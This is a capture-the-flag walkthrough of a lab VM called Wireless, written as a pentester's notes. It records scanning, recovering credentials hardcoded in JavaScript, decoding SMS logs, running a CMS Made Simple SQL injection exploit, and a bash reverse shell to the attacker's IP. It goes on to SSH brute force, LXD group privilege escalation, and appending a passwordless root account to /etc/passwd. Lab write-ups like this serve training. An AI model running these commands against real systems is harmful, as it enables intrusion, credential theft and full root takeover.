Wireless

ip a

192.168.116.128

Information gathering

Host discovery

sudo nmap -sn  192.168.116.0/24

The target IP is 192.168.116.132.

Port discovery

sudo nmap -sT --min-rate 10000 -p-  192.168.116.132 -oA nmapscan/ports

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
8080/tcp open http-proxy

Getting a foothold

Detailed port scan

sudo nmap -sT -sV -sC -O -p22,80,8000,8080 192.168.116.132 -oA nmapscan/detail

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9d:db:a2:46:55:7b:55:67:e3:21:c6:73:62:8c:f8:36 (RSA)
| 256 7f:b7:da:42:ca:47:1e:86:56:65:83:e0:4f:c7:c4:b6 (ECDSA)
|_ 256 4b:4c:5b:e7:75:dd:cb:46:41:a6:51:44:5e:47:2b:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open http Python http.server 3.5 - 3.10
|_http-title: VOIP Solutions
|_http-server-header: VOIP Server
8080/tcp open http Python http.server 3.5 - 3.10
|_http-title: 404 Not Found
|_http-server-header: Internal Server
MAC Address: 00:0C:29:9F:D0:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP scan

sudo nmap -sU --top-ports 20 192.168.116.132 -oA nmapscan/udp

68/udp open|filtered dhcpc

Vulnerability scan

sudo nmap --script=vuln -p22,80,8000,8080 192.168.116.132 -oA nmapscan/vuln

Penetration testing

Port 80 (web)

An Apache default page.

Directory brute force

Nothing was found besides index.

Port 8000 (http-alt)

The page shows the email address jinmori@voip.in. Directory brute force finds:

/admin
/login
/logout
/users

Without logging in, every route returns 401.

I planned to try SQL injection and brute force; injection attempts redirect to the log route, but it shows the same login form.

Then check the login page source; it includes a JS file:

<script src="/static/js/login.js"></script>
<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it

</script>

Follow it and look at login.js:

/******************************************
User Login
/****************************************** */

var delog = atob('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')

It looks encrypted, but hash-identifier does not recognise it.

Asked an AI: atob() is a base64 decoder. Decoding it locally gives:

// Obfuscated string table: index 0 is the username, index 1 a source sentence,
// indices 2 and 3 the method names "charCodeAt" and "fromCharCode"
var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];
var u=_0xb5c3[0];                 // username
var string=_0xb5c3[1];            // sentence the password characters are picked from
var a=string[_0xb5c3[2]](0);      // string.charCodeAt(0), and so on for b..i
var b=string[_0xb5c3[2]](36);
var c=string[_0xb5c3[2]](2);
var d=string[_0xb5c3[2]](8);
var e=string[_0xb5c3[2]](13);
var f=string[_0xb5c3[2]](12);
var g=string[_0xb5c3[2]](14);
var h=string[_0xb5c3[2]](40);
var i=string[_0xb5c3[2]](12);
var p=String[_0xb5c3[3]](a,b,c,d,e,f,g,h,i);   // String.fromCharCode(...) assembles the password

Print the values with console.log():

console.log(_0xb5c3)

console.log(p);

This gives a hint:

> Array ["jinmori", "The quick brown fox jumps over the lazy dog", "charCodeAt", "fromCharCode"]

> "Taekwondo"
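The same recovery done statically, as an added example that is not code from the original post: parse the hex-escaped string table and the charCodeAt()/fromCharCode() picks out of the decoded login.js text instead of executing the untrusted script in a browser console. LOGIN_JS is the fragment shown above; the function names are mine.

```python
# Added example (not from the original post): recover what login.js computes by
# static analysis of the hex-escaped string table and the charCodeAt()/
# fromCharCode() picks, without executing the untrusted script.
import re

# Input: the decoded login.js fragment shown above, embedded as a raw string.
LOGIN_JS = r'''
var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];
var u=_0xb5c3[0];
var string=_0xb5c3[1];
var a=string[_0xb5c3[2]](0);
var b=string[_0xb5c3[2]](36);
var c=string[_0xb5c3[2]](2);
var d=string[_0xb5c3[2]](8);
var e=string[_0xb5c3[2]](13);
var f=string[_0xb5c3[2]](12);
var g=string[_0xb5c3[2]](14);
var h=string[_0xb5c3[2]](40);
var i=string[_0xb5c3[2]](12);
var p=String[_0xb5c3[3]](a,b,c,d,e,f,g,h,i)
'''

def decode_js_strings(js: str) -> list:
    """Decode every backslash-x hex literal in the obfuscated string table."""
    return [re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), lit)
            for lit in re.findall(r'"((?:\\x[0-9A-Fa-f]{2})+)"', js)]

def recover_credentials(js: str) -> tuple:
    """Replay the index picks: string[charCodeAt](N) selects source[N]."""
    table = decode_js_strings(js)
    user, source = table[0], table[1]          # table[2:] are the method names
    # var <name>=string[_0x....[2]](<index>);  ->  {name: index}
    picks = dict(re.findall(r"var (\w+)=string\[_0x\w+\[2\]\]\((\d+)\);", js))
    # String[_0x....[3]](a,b,...) gives the order the characters are joined in
    order = re.search(r"String\[_0x\w+\[3\]\]\(([^)]*)\)", js).group(1)
    password = "".join(source[int(picks[v.strip()])] for v in order.split(","))
    return user, password
```

The point for a defender: a credential embedded in client-side JavaScript is recoverable by anyone with the file, whatever the obfuscation; it is not a secret.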

Using the credentials jinmori / Taekwondo

successfully logs into the backend as admin.

The log page

VOIP LOGS
SMS-SUBMIT
AT+CMGS=118
079161789421834531000B915664141286F40019AA6800480069002000740068006500720065002E002E002E000A000A005300610074002000310034007400680020004E006F007600200032003000320030002000300038003A00300037002E0034003300200061006D002000280047004D0054002B0031002900610073

SMS-DELIVER
07912374151616F6240B912374374521F70000318011419314802A54747A0E4ACF41613768DA9C82A0C42AA88C0FB7E1EC32C82C7FB741F3F61C4EAEBBC6EF36

SMS-STATUS-REPORT
07912374151616F6067A0B912394460238F4318011411300803180114113008000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

SMS-SUBMIT
AT+CMGS=109
079161789421834501000B915664141286F4001B60004F007500720020006E0065007700200064006F006D00610069006E00200066006F007200200057006900460069002000740065007300740069006E006700200069007300200077006900720065006C006500730073002E0063006F006D0020

SMS-SUBMIT
AT+CMGS=98
07914400000000F001000B811000000000F0000061D7B4BCCC2ECFE7206A794E4FBBCF20F85B4E0FB341E939E80D2FBB41E6B71C14AED3D165373D3D0ED3CB64507D5E96CF41F437885E9ED341EFBA1C9476D3CB7277980D7297E9F7B77C0DBAA7E56576793E778DDF6D

SMS-SUBMIT
AT+CMGS=53
07914400000000F001000B811000000000F000002DD4F29C9E769F41D0B79C1E6683D0E139485C2EBB417374DA4C2F9341F43708FE96D375201C0C0703

The message bodies are hex strings (SMS PDUs) and need decoding.

Decoded:

Hi there...

Sat 14th Nov 2020 08:07.43 am (GMT+1)as

This is an SMS PDU example from smspdu.com

Status Report
SMSC:
+32475161616
Sender:
+32496420834
Message Ref#:
122
TimeStamp:
11/08/13 14:31:00 GMT +2
TimeStamp2:
11/08/13 14:31:00 GMT +7.75
Status Byte: 00

Our new domain for WiFi testing is wireless.com

Wireless Testing portal is open for authenticated users to test our internal network wireless.com

Testing Portal has been shifted to port: 8080
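The decoding step above, as an added example that is not code from the original post: a small decoder for the PDU-mode entries in the VOIP log (SMS-SUBMIT, SMS-DELIVER and SMS-STATUS-REPORT, with GSM 7-bit or UCS-2 text). It assumes an international SMSC number and no user-data header, which holds for these log entries; the function names are mine.

```python
# Added example (not from the original post): decode the PDU-mode SMS entries in the
# VOIP log. Handles SMS-SUBMIT/-DELIVER/-STATUS-REPORT with GSM 7-bit or UCS-2 text;
# user-data headers (concatenated SMS) and 8-bit data are left undecoded.
GSM7 = ("@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ !\"#¤%&'()*+,-./0123456789:;<=>?"
        "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà")

def semi_octets(raw: bytes) -> str:          # nibble-swapped BCD, 'F' filler removed
    return "".join(f"{b & 0xF:X}{b >> 4:X}" for b in raw).rstrip("F")

def unpack_7bit(data: bytes, septets: int) -> str:   # LSB-first GSM 7-bit packing
    acc, nbits, out = 0, 0, []
    for b in data:
        acc |= b << nbits
        nbits += 8
        while nbits >= 7 and len(out) < septets:
            out.append(GSM7[acc & 0x7F])
            acc, nbits = acc >> 7, nbits - 7
    return "".join(out)

def address(pdu: bytes, pos: int):           # TP-OA/DA/RA -> (number, next position)
    ndigits, toa = pdu[pos], pdu[pos + 1]
    end = pos + 2 + (ndigits + 1) // 2
    plus = "+" if (toa & 0x70) == 0x10 else ""   # type-of-number 001 = international
    return plus + semi_octets(pdu[pos + 2:end]), end

def decode_pdu(hexstr: str) -> dict:         # hex PDU incl. SMSC prefix -> fields
    pdu = bytes.fromhex(hexstr)
    pos = 1 + pdu[0]                              # SMSC length octet + SMSC
    msg = {"smsc": "+" + semi_octets(pdu[2:pos])} # assumes an international SMSC
    first, pos = pdu[pos], pos + 1
    mti = first & 0x03                            # 0 DELIVER, 1 SUBMIT, 2 STATUS-REPORT
    if mti == 2:
        msg["ref"] = pdu[pos]                     # TP-MR
        msg["recipient"], pos = address(pdu, pos + 1)
        msg["status"] = pdu[pos + 14]             # TP-ST follows TP-SCTS and TP-DT
        return msg
    if mti == 1:
        pos += 1                                  # TP-MR
    msg["address"], pos = address(pdu, pos)
    dcs, pos = pdu[pos + 1], pos + 2              # TP-PID, TP-DCS
    if mti == 0:
        pos += 7                                  # TP-SCTS
    else:                                         # TP-VPF: none/enhanced/relative/absolute
        pos += (0, 7, 1, 7)[(first >> 3) & 0x03]
    udl, ud = pdu[pos], pdu[pos + 1:]
    if (dcs & 0x0C) == 0x08:                      # UCS-2
        msg["text"] = ud[:udl].decode("utf-16-be")
    else:                                         # GSM 7-bit; anything else stays hex
        msg["text"] = unpack_7bit(ud, udl) if (dcs & 0x0C) == 0 else ud[:udl].hex()
    return msg
```

Feed it the hex string exactly as it appears after the AT+CMGS line; the SMSC prefix is part of the PDU, and the AT+CMGS length counts everything after it.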

This reveals the port and domain of the testing site.

Add the domain to the hosts file:

wireless.com

Port 80 now shows content:

Copyright 2004 - 2025 - CMS Made Simple
This site is powered by CMS Made Simple version 2.2.9

A CMS default landing page.

There are some CVEs, but an upload exploit script I tried failed because the earlier credentials do not meet its login requirement.

First, a full pass over port 8080.

curl against 8080 returns only Internal Portal v1.

Directory brute force is also empty. Following the earlier lead, now that we have a domain, try subdomain (vhost) brute force:

sudo gobuster vhost -u http://wireless.com:8080 --append-domain -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

Found: testing.wireless.com:8080 Status: 200 [Size: 4085]

It cannot be accessed directly; the hosts file needs updating.

testing portal

A login page; the earlier credentials still do not work, and subdirectory brute force fails again.

Now there are two different web pages to try.

Since CMSMS 2.2.9 is old and has historical CVEs, its attack surface is larger, so target CMSMS.

CMSMS

CMS Made Simple < 2.2.10 - SQL Injection           | php/webapps/46635.py
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)| php/webapps/51600.txt

The second is also a Python script but requires authentication; attempts failed.

Try the SQL injection to see whether user information can be obtained.

Credential brute force

This script cracks the admin password, exactly what I need!

python2 46635.py -u http://wireless.com/ -cw /usr/share/wordlists/rockyou.txt

A prerequisite install is needed (thanks px):

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
pip2 install setuptools wheel
pip2 install termcolor

python2 46635.py -u http://wireless.com/ -cw /usr/share/wordlists/rockyou.txt

Credentials obtained:

[+] Salt for password found: 551c92a536111490
[+] Username found: juniordev
[+] Email found: juniordev@wireless.com
[+] Password found: a25bb9e6782e7329c236d2538dd4f5ac
[+] Password cracked: passion

juniordev / passion

Backend exploitation

Security Issue
Warning: The installation assistant file: cmsms-2.2.9-install.php still exists in the root directory. As this could potentially be a security vulnerability, please delete it.

There are also upload and user add functions.

After manually adding an admin user, file upload in the content file manager still does not work.

Found an extension:

user_agent Code to show the user’s user agent information

It looks like it executes code:

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.116.128/443 0>&1'");

After writing it in, there are Submit and Run options; Run successfully spawns the reverse shell.

Privilege escalation

www-data

Linux VOIP 5.4.0-67-generic 
#75-Ubuntu SMP Fri Feb 19 18:03:38 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

root:x:0:0:root:/root:/bin/bash
coherer:x:1000:1000:coherer:/home/coherer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

Very strange: the lxd user cannot log in directly, and no home directory was found for it?

The port 8080 site has not been logged into yet; see whether a shell can be obtained there as the lxd user.

Login succeeds.

testing bot

Typing help lists the available commands:

Tools | Logs | Whoami | Clear | Questions

logs downloads a Network.data file.

It contains a lot of text. Could it be the lxd password? Impossible, since lxd cannot log in.

Then perhaps coherer's password?

Turn the file into a wordlist and brute force:

cewl -d 3 http://testing.wireless.com:8080/static/Network.data > pass.txt

sudo hydra -l coherer -P pass.txt ssh://192.168.68.129
[22][ssh] host: 192.168.68.129 login: coherer password: Induction

coherer

SSH in as the user:

uid=1000(coherer) gid=1000(coherer) groups=1000(coherer),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

cat local.txt
4h1642b69b2a23bca3c5867u3f1ffd60

Close to what I expected, but still no privilege escalation vector, and still no way to become lxd.

Since this user has no home directory, look into what it does; a config file was found:

lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

/var/snap/lxd/common$ cat config
# This file is auto-generated, do NOT manually edit
ceph_builtin=false
ceph_external=false
criu_enable=false
daemon_debug=false
daemon_group=lxd
daemon_syslog=false
lvm_external=false
lxcfs_loadavg=false
lxcfs_pidfd=false
lxcfs_cfs=false
openvswitch_builtin=false
shiftfs_enable=auto

Nothing password-related. Asked AI:

It turns out lxd is the root daemon that manages containers on Linux.

https://blog.csdn.net/YouthBelief/article/details/123548739

And the current user is in the lxd group, which satisfies the condition for lxd privilege escalation.

lxd privilege escalation

Confirming the conditions

which lxd
/snap/bin/lxd

which lxc
/snap/bin/lxc

id
uid=1000(coherer) gid=1000(coherer) groups=1000(coherer),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

ping also works: the target has outbound network access.

Attacker machine

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder
sudo ./build-alpine

php -S 0:80

Target

wget http://192.168.68.128/alpine-v3.13-x86_64-20210218_0139.tar.gz

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test
lxc init test test -c security.privileged=true
# (if this errors, run lxd init, accept all the defaults, then retry:)
# lxc init test test -c security.privileged=true
# mount the host's root filesystem into the container
lxc config device add test test disk source=/ path=/mnt/root recursive=true

# start the container and get a shell in it
lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls
cd ./root
cat proof.txt

This effectively mounts the target's filesystem into the container.

Some other files were found under root.

Among them, build.sh:

expect \"Change the root password? \[Y/n\] \"

send \"y\r\"

expect \"New password: \"

send \"RootisnotthathardastheysayButNotEasyEither\r\"

RootisnotthathardastheysayButNotEasyEither

expect \"Disallow root login remotely? \[Y/n\] \"

send \"y\r\"

See whether I can SSH in as coherer and then su to root with it:

RootisnotthathardastheysayButNotEasyEither

No luck; consider it a small easter egg.

But a txt file created inside the container also appeared on the target.

What?

Then a root user can be added:

echo 'choco::0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd